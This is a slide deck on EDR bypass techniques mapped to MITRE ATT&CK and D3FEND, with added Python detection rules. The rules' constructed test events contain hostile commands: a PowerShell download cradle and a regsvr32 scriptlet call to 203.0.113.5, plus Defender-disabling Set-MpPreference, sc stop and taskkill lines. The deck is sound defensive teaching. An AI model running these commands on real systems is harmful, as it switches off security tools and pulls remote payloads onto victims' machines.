Presentation on EDR bypasses and relevant offensive and defensive techniques

CarloDapino 42 views 11 slides Oct 10, 2024

About This Presentation

I will evaluate MITRE ATT&CK techniques specific to EDR bypasses, using the context of a real attack and data breach for each, and highlight the relevant MITRE D3FEND technique for your blue team.


Slide Content

EDR BYPASS
AND LIMITATIONS
By: Carlo Dapino
License Type: CC BY-NC-ND 4.0
https://creativecommons.org/licenses/by-nc-nd/4.0/

OBFUSCATED FILES OR INFORMATION (T1027)
EXAMPLE: IN 2021, THE CONTI RANSOMWARE GANG (A RAAS PLATFORM) WAS KNOWN FOR USING
OBFUSCATED PAYLOADS TO HIDE ITS MALWARE FROM SIGNATURE-BASED SECURITY TOOLS.
CRIMINAL PLATFORM: CONTI RAAS PLATFORM, NOTORIOUS FOR DISTRIBUTING OBFUSCATED
RANSOMWARE ACROSS VARIOUS ORGANIZATIONS.
TOOLS: VEIL (A PAYLOAD GENERATOR WITH ENCODING AND OBFUSCATION MODULES) AND HYPERION (A
RUNTIME PE CRYPTER THAT ENCRYPTS THE EXECUTABLE AND DECRYPTS IT IN MEMORY WHEN IT RUNS) ARE
COMMONLY USED TO OBFUSCATE MALICIOUS FILES AND SCRIPTS, HELPING ATTACKERS EVADE DETECTION.
MITIGATION: DO NOT RELY ON STATIC SIGNATURES ALONE. SCORE FILES BY ENTROPY AND PACKER
INDICATORS, ENABLE POWERSHELL SCRIPT BLOCK LOGGING AND AMSI SO THAT THE DE-OBFUSCATED CODE
REACHES THE DETECTION ENGINE, AND SCAN CODE REGULARLY FOR OBFUSCATED CONTENT.
DEFENSE REFERENCE (MITRE D3FEND): DFD0007 - OBFUSCATED FILE ANALYSIS: DE-OBFUSCATION
TECHNIQUES TO ANALYZE CODE FOR HIDDEN THREATS.
Copyright 2024 - Carlo Dapino
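The two checks below are an added example of the de-obfuscation and entropy analysis this slide calls for; they are not code from the presentation. The command line, the packed blob and the script text are all constructed here, the token list and the 6.5-bit entropy threshold are starting points to tune, and the 203.0.113.5 address is a documentation address, not a real C2.

```python
"""Added example, not part of the slides: two checks a blue team can run over
its own telemetry for T1027. Every sample input below is constructed inline."""
import base64
import math
import random
import re
from collections import Counter

# powershell.exe accepts any unambiguous prefix of -EncodedCommand.
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
INNER_B64 = re.compile(
    r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)", re.IGNORECASE)
# Tokens that rarely appear in benign encoded commands; extend per environment.
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
              "frombase64string", "-w hidden", "reflection.assembly")


def _decode_layer(b64: str) -> str:
    raw = base64.b64decode(b64, validate=True)
    # -EncodedCommand payloads are UTF-16LE (every odd byte is 0 for ASCII text);
    # FromBase64String blobs are normally UTF-8/ASCII.
    if len(raw) % 2 == 0 and all(raw[i] == 0 for i in range(1, min(len(raw), 64), 2)):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def deobfuscate_powershell(cmdline: str, max_layers: int = 4) -> list:
    """Peel base64 layers off a PowerShell command line. Returns every layer,
    outermost first, so the analyst can read the final plaintext."""
    layers = [cmdline]
    current = cmdline
    for _ in range(max_layers):
        match = ENCODED_FLAG.search(current) or INNER_B64.search(current)
        if not match:
            break
        try:
            current = _decode_layer(match.group(1))
        except (ValueError, UnicodeDecodeError):
            break
        layers.append(current)
    return layers


def suspicious_tokens(text: str) -> list:
    low = text.lower()
    return [t for t in SUSPICIOUS if t in low]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte. Packed or encrypted sections approach 8.0; code and
    script text normally sit below 6.5, which is the usual packer heuristic."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


# --- constructed samples, not real telemetry -------------------------------
_INNER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')"
_MIDDLE = ("IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
           + base64.b64encode(_INNER.encode()).decode() + "')))")
SAMPLE_CMDLINE = ("powershell.exe -nop -w hidden -enc "
                  + base64.b64encode(_MIDDLE.encode("utf-16-le")).decode())
PACKED_BLOB = random.Random(7).randbytes(4096)   # stands in for a crypter's output
PLAIN_BLOB = (_INNER * 40).encode()              # stands in for ordinary script text

if __name__ == "__main__":
    layers = deobfuscate_powershell(SAMPLE_CMDLINE)
    for i, layer in enumerate(layers):
        print(f"layer {i}: {layer[:80]}")
    print("tokens:", suspicious_tokens(layers[-1]))
    print(f"entropy packed={shannon_entropy(PACKED_BLOB):.2f} "
          f"plain={shannon_entropy(PLAIN_BLOB):.2f}")
```

Run on the sample, the script peels the `-enc` layer (UTF-16LE) and then the inner `FromBase64String` layer (UTF-8) and reports the download cradle that neither layer showed in the raw command line; the entropy function is what a packer heuristic applies to each PE section rather than to the whole file.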

PROCESS INJECTION (T1055, COMMONLY CALLED CODE INJECTION)
EXAMPLE: RYUK RANSOMWARE INJECTS ITS CODE INTO RUNNING LEGITIMATE PROCESSES (THE
VIRTUALALLOCEX / WRITEPROCESSMEMORY / CREATEREMOTETHREAD CHAIN) SO THAT THE MALICIOUS
ACTIVITY EXECUTES UNDER A TRUSTED PROCESS NAME AND EVADES EDR.
CRIMINAL PLATFORM: RYUK RAAS.
TOOLS: METASPLOIT AND COBALT STRIKE, BOTH OF WHICH OFFER BUILT-IN PROCESS INJECTION.
DEFENSE REFERENCE: DFD0009 - CODE INJECTION DETECTION: MONITOR FOR CROSS-PROCESS HANDLES
OPENED WITH WRITE AND THREAD-CREATION RIGHTS, REMOTE THREAD CREATION, AND EXECUTABLE
MEMORY THAT IS NOT BACKED BY AN IMAGE ON DISK.
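The detection pass below is an added example of the monitoring this slide recommends, not code from the presentation. It runs over constructed records shaped like Sysmon Event ID 10 (ProcessAccess) and Event ID 8 (CreateRemoteThread); the field names follow Sysmon's schema, while the trusted-source and high-value-target lists are assumptions to tune per host role.

```python
"""Added example, not part of the slides: a detection pass for T1055 over
constructed records shaped like Sysmon Event ID 10 (ProcessAccess) and
Event ID 8 (CreateRemoteThread). The VirtualAllocEx / WriteProcessMemory /
CreateRemoteThread chain used by Ryuk-style injectors produces exactly this
pair: a handle with write+thread rights, then a thread in the target."""
from typing import Optional

# Process access rights from winnt.h that an injector needs on its target.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Remote threads from these sources are normal on Windows; tune per host role.
TRUSTED_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
}
# Thread entry points that mean "load my DLL" (classic DLL injection).
LOADER_ENTRYPOINTS = {"loadlibrarya", "loadlibraryw", "loadlibraryexa", "loadlibraryexw"}
HIGH_VALUE_TARGETS = {"lsass.exe", "explorer.exe", "svchost.exe", "winlogon.exe"}


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def flag_process_access(ev: dict) -> Optional[str]:
    """Event ID 10: another process opened a handle with all three rights an
    injector needs. Credential dumping (0x1010/0x1410 on lsass) does NOT
    match this mask on purpose; that is a separate rule."""
    src, tgt = ev["SourceImage"].lower(), ev["TargetImage"].lower()
    granted = int(ev["GrantedAccess"], 16)
    if src == tgt or src in TRUSTED_SOURCES:
        return None
    if granted & INJECT_MASK == INJECT_MASK:
        return f"T1055 handle: {_base(src)} -> {_base(tgt)} access={ev['GrantedAccess']}"
    return None


def flag_remote_thread(ev: dict) -> Optional[str]:
    """Event ID 8: a thread created inside another process. An empty
    StartFunction means the entry is not an exported symbol (shellcode);
    LoadLibrary* as the entry is DLL injection."""
    src, tgt = ev["SourceImage"].lower(), ev["TargetImage"].lower()
    if src == tgt or src in TRUSTED_SOURCES:
        return None
    start = ev.get("StartFunction", "").lower()
    if not start or start in LOADER_ENTRYPOINTS or _base(tgt) in HIGH_VALUE_TARGETS:
        return f"T1055 thread: {_base(src)} -> {_base(tgt)} entry={start or ev.get('StartAddress')}"
    return None


def detect(events: list) -> list:
    handlers = {8: flag_remote_thread, 10: flag_process_access}
    alerts = []
    for ev in events:
        hit = handlers.get(ev["EventID"], lambda e: None)(ev)
        if hit:
            alerts.append(hit)
    return alerts


# --- constructed sample events, not real telemetry --------------------------
STAGER = r"C:\Users\bob\AppData\Local\Temp\update.exe"
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceImage": STAGER, "TargetImage": r"C:\Windows\System32\svchost.exe",
     "GrantedAccess": "0x1FFFFF"},                                     # PROCESS_ALL_ACCESS
    {"EventID": 8, "SourceImage": STAGER, "TargetImage": r"C:\Windows\System32\svchost.exe",
     "StartAddress": "0x000001F3A2B40000", "StartFunction": ""},       # shellcode entry
    {"EventID": 8, "SourceImage": r"C:\Program Files\Vendor\app.exe",
     "TargetImage": r"C:\Program Files\Vendor\helper.exe",
     "StartAddress": "0x00007FFB1C2A0000", "StartFunction": "LoadLibraryW"},  # DLL injection
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Program Files\Vendor\app.exe",
     "StartAddress": "0x00007FFB1D1B0000", "StartFunction": "TppWorkerThread"},  # benign
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1000"},  # benign
    {"EventID": 10, "SourceImage": STAGER, "TargetImage": r"C:\Windows\System32\lsass.exe",
     "GrantedAccess": "0x1410"},   # credential-dump pattern; out of scope for this rule
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Three of the six records fire: the full-access handle, the thread whose entry resolves to no export (shellcode), and the thread that starts at LoadLibraryW. The 0x1410 handle on lsass is deliberately left to a credential-dumping rule so that one rule does not try to cover two techniques.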

DISABLING OR MODIFYING SECURITY SOFTWARE (T1562 IMPAIR DEFENSES, SUB-TECHNIQUE T1562.001)
EXAMPLE: IN THE 2021 KASEYA VSA INCIDENT, THE REVIL (SODINOKIBI) PAYLOAD DELIVERED THROUGH THE
EXPLOITED MANAGEMENT PLATFORM RAN POWERSHELL SET-MPPREFERENCE TO TURN OFF DEFENDER REAL-TIME
MONITORING, IOAV, SCRIPT SCANNING AND SAMPLE SUBMISSION BEFORE DROPPING THE ENCRYPTOR.
CRIMINAL PLATFORM: REVIL RAAS.
TOOLS: PROCESS HACKER, WHOSE SIGNED KERNEL DRIVER (KPROCESSHACKER.SYS) LETS IT TERMINATE
SECURITY PROCESSES THAT USER-MODE TOOLS SUCH AS TASKKILL CANNOT.
DEFENSE REFERENCE: DFD0012 - SOFTWARE CONFIGURATION MONITORING: TRACK CHANGES TO SECURITY
TOOLS (DEFENDER POLICY KEYS, SERVICE STATE, PREFERENCE CHANGES, KILLED AGENT PROCESSES, LOADED
DRIVERS) AND ENABLE THE AGENT'S TAMPER-PROTECTION / SELF-PROTECTION MECHANISMS.
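The rules below are an added example of the configuration monitoring this slide recommends; they are not code from the presentation. They run over constructed Sysmon-style records (Event ID 1 process creation, Event ID 13 registry value set, Event ID 6 driver load); the service, process and driver name lists are assumptions that cover a few common products and need your own vendor's names added.

```python
"""Added example, not part of the slides: detection rules for T1562.001 over
constructed Sysmon-style records (Event ID 1 process creation, Event ID 13
registry value set, Event ID 6 driver load). The Set-MpPreference sample has
the shape of the command the Kaseya-delivered REvil payload ran."""
import re
from typing import Optional

SECURITY_SERVICES = {"windefend", "sense", "wdnissvc", "securityhealthservice", "wscsvc"}
# Agent processes of common AV/EDR products; add your own vendor's names.
SECURITY_PROCESSES = {"msmpeng.exe", "mssense.exe", "sensecncproxy.exe",
                      "csfalconservice.exe", "sentinelagent.exe", "cylancesvc.exe"}
# Signed third-party drivers abused to kill protected processes from kernel mode.
KILLER_DRIVERS = {"kprocesshacker.sys", "rtcore64.sys"}
# Registry values that switch Defender off by policy.
DEFENDER_KEYS = (r"\windows defender\disableantispyware",
                 r"\windows defender\disableantivirus",
                 r"\real-time protection\disablerealtimemonitoring")

DEFENDER_PREF = re.compile(
    r"set-mppreference.*-disable\w+\s+\$?true|add-mppreference.*-exclusion", re.I)
SERVICE_STOP = re.compile(
    r"\b(?:sc(?:\.exe)?\s+(?:stop|delete|config)|net1?(?:\.exe)?\s+stop)\s+(\S+)", re.I)
TASKKILL = re.compile(r"taskkill(?:\.exe)?\s.*?/im\s+(\S+)", re.I)


def flag_process_create(ev: dict) -> Optional[str]:
    cmd = ev["CommandLine"]
    if DEFENDER_PREF.search(cmd):
        return f"T1562.001 Defender preference tampering: {cmd[:70]}"
    m = SERVICE_STOP.search(cmd)
    if m and m.group(1).lower() in SECURITY_SERVICES:
        return f"T1562.001 security service stopped: {m.group(1)}"
    m = TASKKILL.search(cmd)
    if m and m.group(1).lower().strip('"') in SECURITY_PROCESSES:
        return f"T1562.001 security process killed: {m.group(1)}"
    return None


def flag_registry_set(ev: dict) -> Optional[str]:
    target = ev["TargetObject"].lower()
    enabled = ev["Details"].upper().startswith("DWORD (0X00000001)")
    if enabled and any(k in target for k in DEFENDER_KEYS):
        return f"T1562.001 Defender disabled via policy key: {ev['TargetObject']}"
    return None


def flag_driver_load(ev: dict) -> Optional[str]:
    driver = ev["ImageLoaded"].rsplit("\\", 1)[-1].lower()
    if driver in KILLER_DRIVERS:
        # A valid signature is expected here: that is the whole point of BYOVD.
        return f"T1562.001 process-killer driver loaded: {driver} signed={ev.get('Signed')}"
    return None


def detect(events: list) -> list:
    handlers = {1: flag_process_create, 13: flag_registry_set, 6: flag_driver_load}
    alerts = []
    for ev in events:
        hit = handlers.get(ev["EventID"], lambda e: None)(ev)
        if hit:
            alerts.append(hit)
    return alerts


# --- constructed sample events, not real telemetry --------------------------
SAMPLE_EVENTS = [
    {"EventID": 1, "CommandLine": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true "
                                  "-DisableIOAVProtection $true -DisableScriptScanning $true "
                                  "-MAPSReporting Disabled -SubmitSamplesConsent NeverSend"},
    {"EventID": 1, "CommandLine": "sc.exe stop WinDefend"},
    {"EventID": 1, "CommandLine": "net stop Spooler"},                    # benign service stop
    {"EventID": 1, "CommandLine": "taskkill /F /IM MsMpEng.exe"},
    {"EventID": 1, "CommandLine": "taskkill /F /IM notepad.exe"},         # benign kill
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 6, "ImageLoaded": r"C:\Program Files\Process Hacker 2\kprocesshacker.sys",
     "Signed": "true"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The driver rule is the one that catches the Process Hacker case: the kill itself happens in the kernel and never shows up as a taskkill command line, so the only reliable precursor is the driver load, and a valid signature on that driver is not a reason to suppress the alert.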

LIVING OFF THE LAND (LOLBINS) (T1218 SYSTEM BINARY PROXY EXECUTION; POWERSHELL AND WMIC
THEMSELVES MAP TO T1059.001 AND T1047)
EXAMPLE: FIN7 USED POWERSHELL AND WMIC TO EXECUTE MALICIOUS PAYLOADS WITHOUT NEEDING TO DROP
NEW EXECUTABLE FILES, SO THERE WAS NO UNKNOWN BINARY FOR THE EDR TO FLAG.
CRIMINAL PLATFORM: FIN7 GROUP.
TOOLS: POWERSHELL AND WMIC, LEGITIMATE SIGNED MICROSOFT TOOLS LEVERAGED FOR MALICIOUS INTENT.
DEFENSE REFERENCE: DFD0016 - APPLICATION EXECUTION PREVENTION: RESTRICT ACCESS TO POTENTIALLY
DANGEROUS SYSTEM TOOLS WITH APPLICATION CONTROL (APPLOCKER / WDAC), POWERSHELL CONSTRAINED
LANGUAGE MODE, AND REMOVAL OF WMIC WHERE IT IS NOT NEEDED (MICROSOFT HAS DEPRECATED IT).
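Where execution prevention cannot be applied, the command-line and parent/child rules below are the detection side for the same binaries. They are an added example and not code from the presentation; the records are constructed Sysmon Event ID 1 fields, the rule table is a starting point rather than a complete LOLBin catalogue, and the 203.0.113.5 address is a documentation address.

```python
"""Added example, not part of the slides: command-line and parent/child rules
for LOLBin abuse (T1218 and the WMI/PowerShell paths FIN7 used) over constructed
Sysmon Event ID 1 records. A remote 'wmic process call create' lands on the
target as a child of WmiPrvSE.exe, which is what the last rule keys on."""
import re
from typing import Optional

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
USER_WRITABLE = re.compile(
    r"\\(?:users\\[^\\]+\\appdata|users\\public|windows\\temp|programdata)\\", re.I)

# (rule name, ATT&CK id, image basename, pattern on the command line)
ARG_RULES = [
    ("wmic remote/local process create", "T1047", "wmic.exe",
     re.compile(r"process\s+call\s+create", re.I)),
    ("rundll32 inline script or URL", "T1218.011", "rundll32.exe",
     re.compile(r"javascript:|vbscript:|https?://", re.I)),
    ("regsvr32 scriptlet (squiblydoo)", "T1218.010", "regsvr32.exe",
     re.compile(r"/i:https?://|scrobj\.dll", re.I)),
    ("mshta inline or remote", "T1218.005", "mshta.exe",
     re.compile(r"javascript:|vbscript:|https?://", re.I)),
    ("certutil download/decode", "T1105/T1140", "certutil.exe",
     re.compile(r"-urlcache|-decode", re.I)),
]


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def flag_lolbin(ev: dict) -> Optional[str]:
    image, parent, cmd = _base(ev["Image"]), _base(ev["ParentImage"]), ev["CommandLine"]
    for name, tid, binary, pat in ARG_RULES:
        if image == binary and pat.search(cmd):
            return f"{tid} {name}: {cmd[:70]}"
    if image == "rundll32.exe" and USER_WRITABLE.search(cmd):
        return f"T1218.011 rundll32 loading a DLL from a user-writable path: {cmd[:70]}"
    if parent in OFFICE and image in SCRIPT_HOSTS:
        return f"T1204.002 {parent} spawned {image}: {cmd[:70]}"
    if parent == "wmiprvse.exe" and image in SCRIPT_HOSTS:
        return f"T1047 WMI-launched {image}: {cmd[:70]}"
    return None


def detect(events: list) -> list:
    return [hit for hit in (flag_lolbin(ev) for ev in events) if hit]


# --- constructed sample events, not real telemetry --------------------------
OFFICE_DIR = r"C:\Program Files\Microsoft Office\root\Office16"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'wmic /node:fs01 process call create "powershell -nop -w hidden -enc SQBFAFgA"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell -nop -w hidden -enc SQBFAFgA"},           # lands on the target host
    {"Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "regsvr32 /s /n /u /i:http://203.0.113.5/x.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},   # benign
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": OFFICE_DIR + r"\WINWORD.EXE",
     "CommandLine": r"rundll32.exe C:\Users\bob\AppData\Roaming\x.dll,Start"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil -hashfile setup.iso SHA256"},                               # benign
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": OFFICE_DIR + r"\WINWORD.EXE",
     "CommandLine": "cmd /c start /min notepad"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The first two records are the two halves of one FIN7-style action: the operator's wmic call on the source host and the resulting PowerShell child of WmiPrvSE.exe on the target, so either host alone is enough to raise the alert.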

PROCESS DOPPELGÄNGING (T1055.013)
EXAMPLE: SYNACK RANSOMWARE (2018) WAS THE FIRST MALWARE SEEN USING PROCESS DOPPELGÄNGING IN
THE WILD TO EXECUTE ITS PAYLOAD WITHOUT LEAVING IT ON DISK; IT WAS LATER SEEN IN TRICKBOT AND
BAZAR. NOTPETYA (JUNE 2017) PREDATES THE TECHNIQUE'S PUBLIC DISCLOSURE AT BLACK HAT EUROPE IN
DECEMBER 2017 AND DID NOT USE IT.
CRIMINAL PLATFORM: SYNACK (TARGETED RANSOMWARE); TRICKBOT AND BAZAR (CRIMEWARE LOADERS).
TOOLS: PUBLIC PROOF-OF-CONCEPT CODE FOLLOWING THE ENSILO RESEARCH. THE SEQUENCE IS
CREATEFILETRANSACTED ON A LEGITIMATE FILE, WRITE THE PAYLOAD INSIDE THE TRANSACTION,
NTCREATESECTION FROM THE TRANSACTED FILE, ROLLBACKTRANSACTION (THE ORIGINAL BYTES RETURN TO
DISK), THEN NTCREATEPROCESSEX FROM THE SECTION: THE PAYLOAD NEVER PERSISTS ON DISK.
DEFENSE REFERENCE: DFD0009 - PROCESS INJECTION DETECTION: ADVANCED MEMORY FORENSICS THAT
COMPARES THE IMAGE MAPPED INTO A PROCESS WITH THE FILE AT ITS IMAGE PATH, AND FLAGS PROCESSES
CREATED FROM A SECTION HANDLE BY NON-SYSTEM PARENTS.
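The audit below is an added example of the memory-versus-disk comparison this slide's defense reference describes; it is not code from the presentation. Its central modelling assumption is that the EDR can hash both the file at a process's image path and the PE image actually mapped into the process, and can see which API created the process: the fields on_disk_image, mapped_image and create_api stand in for that telemetry, and the records are constructed.

```python
"""Added example, not part of the slides: the check behind memory forensics
for T1055.013 and its relatives (process hollowing shows the same hash
mismatch). Modelling assumption: the EDR can hash the file at the image path
and the PE image mapped into the process, and knows the creating API; the
fields on_disk_image, mapped_image and create_api stand in for that
telemetry. All sample records are constructed inline."""
import hashlib
from typing import Optional

SYSTEM_PARENTS = {"smss.exe", "wininit.exe", "services.exe", "csrss.exe"}


def sha256(data: Optional[bytes]) -> Optional[str]:
    return hashlib.sha256(data).hexdigest() if data is not None else None


def audit_process(rec: dict) -> list:
    """Return the reasons a process looks like it was started from a payload
    that is not the file at its image path. An empty list means consistent."""
    findings = []
    on_disk, mapped = rec["on_disk_image"], rec["mapped_image"]
    if on_disk is None:
        # The transaction that carried the payload was rolled back (or the
        # file was deleted after mapping): the image path no longer resolves.
        findings.append("no backing file at image path")
    elif sha256(on_disk) != sha256(mapped):
        # Rollback restored the legitimate bytes on disk; memory holds the payload.
        findings.append("mapped image differs from on-disk file")
    if rec.get("create_api") == "NtCreateProcessEx" and rec["parent"].lower() not in SYSTEM_PARENTS:
        # Doppelgänging builds the process from a section handle instead of
        # calling CreateProcess; ordinary user-land parents never do this.
        findings.append("created from a section handle by a non-system parent")
    return findings


def audit_all(records: list) -> dict:
    return {r["pid"]: audit_process(r) for r in records}


# --- constructed sample records, not real telemetry -------------------------
LEGIT_SVCHOST = b"MZ" + b"legitimate svchost image bytes" * 8
PAYLOAD = b"MZ" + b"ransomware payload bytes" * 9
SAMPLE = [
    {"pid": 804, "image": r"C:\Windows\System32\svchost.exe", "parent": "services.exe",
     "create_api": "CreateProcessW", "on_disk_image": LEGIT_SVCHOST, "mapped_image": LEGIT_SVCHOST},
    {"pid": 5120, "image": r"C:\Windows\System32\svchost.exe", "parent": "update.exe",
     "create_api": "NtCreateProcessEx", "on_disk_image": LEGIT_SVCHOST, "mapped_image": PAYLOAD},
    {"pid": 5188, "image": r"C:\Users\bob\AppData\Local\Temp\tmp1.exe", "parent": "update.exe",
     "create_api": "NtCreateProcessEx", "on_disk_image": None, "mapped_image": PAYLOAD},
]

if __name__ == "__main__":
    for pid, findings in audit_all(SAMPLE).items():
        print(pid, findings or "consistent")
```

PID 5120 is the doppelgänging case from the slide: the file at the image path is the genuine svchost.exe because the transaction was rolled back, yet the mapped image is the payload. PID 5188 is the variant where the transacted file was created inside the transaction and therefore vanished with it.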

VIRTUALIZATION/SANDBOX EVASION (T1497)
EXAMPLE: MAZE RANSOMWARE CHECKED FOR SANDBOX AND ANALYSIS ENVIRONMENTS AND DELAYED EXECUTION SO
THAT AUTOMATED DETONATION TIMED OUT BEFORE THE MALICIOUS BEHAVIOUR APPEARED.
CRIMINAL PLATFORM: MAZE RAAS.
TOOLS: PARANOID FISH (PAFISH), AN OPEN-SOURCE PROGRAM THAT RUNS THE SAME VM AND SANDBOX CHECKS
MALWARE USES (CPUID HYPERVISOR BIT, VM MAC PREFIXES AND DEVICE NAMES, REGISTRY ARTIFACTS, SLEEP
ACCELERATION AND TIMING CHECKS); ATTACKERS COPY THE CHECKS, DEFENDERS RUN IT TO TEST THEIR
SANDBOXES.
DEFENSE REFERENCE: DFD0018 - VIRTUALIZATION EVASION DETECTION: HARDEN SANDBOX AND VIRTUAL
ENVIRONMENTS SO THEY DO NOT REVEAL THEMSELVES (REALISTIC HARDWARE, UPTIME AND USER ARTIFACTS,
NO MEASURABLE SLEEP SKIPPING), DETONATE SAMPLES LONG ENOUGH TO OUTLAST DELAYS, AND TREAT THE
EVASION CHECKS THEMSELVES AS A DETECTION SIGNAL.

MASQUERADING (T1036)
EXAMPLE: THE SOLARWINDS ATTACKERS TROJANIZED THE ORION BUILD (SUNBURST) SO THE BACKDOOR SHIPPED
INSIDE A LEGITIMATE, SIGNED SOLARWINDS DLL DELIVERED AS A NORMAL SOFTWARE UPDATE, AND ITS C2
TRAFFIC MIMICKED THE ORION IMPROVEMENT PROGRAM PROTOCOL, SO NEITHER THE FILE NOR THE NETWORK
ACTIVITY LOOKED OUT OF PLACE.
CRIMINAL PLATFORM: APT29 (ATTRIBUTED TO RUSSIA'S SVR).
TOOLS: BATCHOBFUSCATOR TO MODIFY FILE NAMES AND METADATA TO EVADE DETECTION.
DEFENSE REFERENCE: DFD0014 - FILE METADATA MONITORING: ANALYZE AND VERIFY FILE METADATA FOR
CONSISTENCY AND AUTHENTICITY (NAME VS. ORIGINAL FILE NAME, EXPECTED PATH AND PARENT PROCESS,
AUTHENTICODE SIGNATURE AND PUBLISHER). NOTE THAT A TROJANIZED SIGNED UPDATE PASSES THESE CHECKS,
SO THEY MUST BE PAIRED WITH SUPPLY-CHAIN CONTROLS (T1195.002).
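The checks below are an added example of the metadata consistency analysis this slide's defense reference describes; they are not code from the presentation. The records are constructed Sysmon Event ID 1 fields (OriginalFileName comes from the PE version resource, which Sysmon logs), and the expected-directory and expected-parent tables are assumptions for a default Windows install. As the slide's caveat says, a validly signed trojanized update such as SUNBURST passes every one of these checks, so they catch renamed, relocated or look-alike binaries and nothing more.

```python
"""Added example, not part of the slides: metadata-consistency checks for
T1036 over constructed Sysmon Event ID 1 records. OriginalFileName comes from
the PE version resource, so a renamed binary keeps betraying its real name."""
import re

# Windows core binaries and where they must live (lower-case, no drive letter).
EXPECTED_DIR = {
    "svchost.exe": r"\windows\system32", "lsass.exe": r"\windows\system32",
    "csrss.exe": r"\windows\system32", "services.exe": r"\windows\system32",
    "winlogon.exe": r"\windows\system32", "smss.exe": r"\windows\system32",
    "wininit.exe": r"\windows\system32", "explorer.exe": r"\windows",
}
EXPECTED_PARENT = {"svchost.exe": "services.exe", "lsass.exe": "wininit.exe",
                   "csrss.exe": "smss.exe", "winlogon.exe": "smss.exe"}
RTLO = "\u202e"  # right-to-left override, used to hide the real extension
DOUBLE_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?|jpg|txt)\.(?:exe|scr|com)$")


def _split(path: str):
    p = path.lower()
    p = p[2:] if re.match(r"[a-z]:", p) else p       # drop the drive letter
    directory, _, name = p.rpartition("\\")
    return directory, name


def _edit_distance_1(a: str, b: str) -> bool:
    """True if a and b differ by exactly one substitution, insertion or deletion."""
    if a == b or abs(len(a) - len(b)) > 1:
        return False
    if len(a) == len(b):
        return sum(x != y for x, y in zip(a, b)) == 1
    short, long = (a, b) if len(a) < len(b) else (b, a)
    return any(long[:i] + long[i + 1:] == short for i in range(len(long)))


def flag_masquerade(ev: dict) -> list:
    findings = []
    directory, name = _split(ev["Image"])
    parent = _split(ev["ParentImage"])[1]
    original = ev.get("OriginalFileName", "").lower()
    if name in EXPECTED_DIR and directory != EXPECTED_DIR[name]:
        findings.append(f"{name} outside {EXPECTED_DIR[name]}")
    if name in EXPECTED_PARENT and parent != EXPECTED_PARENT[name]:
        findings.append(f"{name} parented by {parent}, expected {EXPECTED_PARENT[name]}")
    if original and original != name:
        # Tune: a few Microsoft binaries legitimately carry a different OriginalFileName.
        findings.append(f"renamed binary: {name} is really {original}")
    if RTLO in ev["Image"] or DOUBLE_EXT.search(name):
        findings.append("deceptive file name (RTLO or double extension)")
    if name not in EXPECTED_DIR and any(_edit_distance_1(name, k) for k in EXPECTED_DIR):
        findings.append(f"look-alike of a system binary name: {name}")
    return findings


def audit(events: list) -> list:
    return [flag_masquerade(ev) for ev in events]


# --- constructed sample events, not real telemetry --------------------------
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "OriginalFileName": "svchost.exe"},                                              # genuine
    {"Image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe",
     "ParentImage": r"C:\Users\bob\AppData\Local\Temp\update.exe", "OriginalFileName": ""},
    {"Image": r"C:\ProgramData\update.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "OriginalFileName": "mimikatz.exe"},
    {"Image": r"C:\Windows\System32\svch0st.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "OriginalFileName": "svch0st.exe"},
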